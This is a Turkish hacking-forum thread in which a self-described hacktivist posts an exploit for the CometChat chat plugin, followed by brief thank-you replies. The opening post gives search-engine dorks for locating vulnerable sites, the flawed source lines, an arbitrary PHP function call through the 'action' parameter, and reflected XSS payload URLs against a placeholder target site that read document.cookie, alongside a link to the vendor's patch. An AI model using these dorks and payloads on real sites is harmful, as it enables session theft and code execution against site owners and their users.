Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: CometChat Plugin Kritik XSS Exploit
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2768
Mesaj Sayısı: 6323
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
CometChat Plugin Kritik XSS Exploit
29.06.2015 19:07
Satıcı Anasayfası =>
Kod:
http://www.cometchat.com/

Aratma Kodu =>
Kod:
inurl:''/cometchat/plugins/filetransfer/uploads/''
Kod:
inurl:''plugins/otavchat/invite.php''

Hangi Hazır Scriptlerde Kullanılabilir ve Açık Ortaya Çıkabilir =>

MyBB, VBulletin, SMF, Joomla, WordPress, phpFOX, Elgg

Açığı Kapatma Yolu Güncelleştirme =>
Kod:
http://www.cometchat.com/blog/cometchat-critical-security-update/

4.6 Versiyonunu yükleyerek en son sürümü yükleyebilirsiniz.

Kod:
http://www.cometchat.com/blog/cometchat-critical-security-update/

1) Kodun Düzenlenmesi ve Hata Olan Kısım => (plugins/otavchat/invite.php)

Kod:
194: call_user_func call_user_func($_GET['action']);

Örnek => HEDEFSITE/cometchat/plugins/otavchat/invite.php?action=phpinfo

2.)XSS P0C => (plugins/otavchat/invite.php)
Kod:
137: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>   <title>{$otavchat_language[18]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/otavchat{$rtl}.css" />   </head>  <body>  <form method="post" action="invite.php?action=inviteusers">  <div class="container2">  <div style="background-color:#3E92BD;border-bottom:1px solid #11648F;">   <div class="invitetitle">{$otavchat_language[16]}</div><div style="float:right"><input type=submit value="{$otavchat_language[17]}" class="invitebutton"></div>   <div style="clear:both"></div>  </div>    <div style="height:162px;overflow-x:hidden;overflow-y:scroll;clear:both;padding-left:5px;padding-top:5px;padding-bottom:5px;">{$s['available']}{$s['away']}{$s['offline']}</div>  </div>    <input type="hidden" name="roomid" value="$id">  </form>  </body>  </html>  EOD;
87: $id = $_GET['roomid'];

Örnek =>

Kod:
HEDEFSITE/cometchat/plugins/otavchat/invite.php?roomid="><script>alert(document.cookie)</script>

3) XSS Kodlarının Hata Oluşan Yer => (plugins/filetransfer/index.php)

Kod:
87: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>  <title>{$filetransfer_language[0]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/filetransfer{$rtl}.css" />   <script type="text/javascript" src="styleinput.js"></script>  </head>    <body><form name="upload" action="upload.php" method="post" enctype="multipart/form-data">  <div class="container">  <div class="container_title">{$filetransfer_language[1]}</div>    <div class="container_body">    <div class="container_body_1">{$filetransfer_language[2]}</div>  <div id="select-0" class="container_body_2"><label class="cabinet"><input type="file" class="file" name="Filedata" onchange="javascript:document.upload.submit()"/></label></div>    <div class="container_body_3">{$filetransfer_language[4]}</div>  <div style="clear:both"></div>      <div class="container_body_4">{$filetransfer_language[3]}</div>    <input type="hidden" name="to" value="{$toId}">  <input type="hidden" name="chatroommode" value="{$chatroommode}">    </div>  </div>  </div>    <script>  SI.Files.stylizeAll();  </script>  </form>  </body>  </html>  EOD;
79: $toId = $_GET['id'];

Örnek =>

HEDEFSITE/cometchat/plugins/filetransfer/index.php?id="><script>alert(document.cookie)</script>
Hide Post
(Bu konu en son: 29.06.2015 Tarihinde, Saat: 19:54 düzenlenmiştir. Düzenleyen: H4CK4L.)
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,053 / 1,053
Deneyim: 14 / 100
Rep Sayısı: 1056
Mesaj Sayısı: 3021
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: CometChat Plugin Kritik XSS Exploit
29.06.2015 19:54
eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 34
Yaşam Puanı: 718 / 826
Deneyim: 4 / 100
Rep Sayısı: 425
Mesaj Sayısı: 1618
Üyelik Tarihi: 06.11.2013
     
Yorum: #3
Cvp: CometChat Plugin Kritik XSS Exploit
30.06.2015 09:29
Demek illegalizm in acigida buydu baktim ama bulamadim xss acigin aklima gelmedin Smile Smile
Ellerine saglik abi

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
DARKDAYS
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 29
Yaşam Puanı: 709 / 709
Deneyim: 36 / 100
Rep Sayısı: 432
Mesaj Sayısı: 1121
Üyelik Tarihi: 08.04.2017
      
Yorum: #4
RE: CometChat Plugin Kritik XSS Exploit
15.04.2017 05:10
Ellerine Sağlık Usta

Parmak uçlarına bak, parmak izlerini görüceksin ve o izlerden ne önce, ne şimdi, ne daha sonra olucak.
Dünya üzerinde 150 Milyar insan yaşamış, biri o parmak izlerine sahip değil !
Alinti
GrandWolfx
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 49 / 233
Deneyim: 35 / 100
Rep Sayısı: 8
Mesaj Sayısı: 128
Üyelik Tarihi: 10.04.2017
     
Yorum: #5
RE: CometChat Plugin Kritik XSS Exploit
15.04.2017 08:47
Ellerine Sağlık Üstat
Alinti



1 Ziyaretçi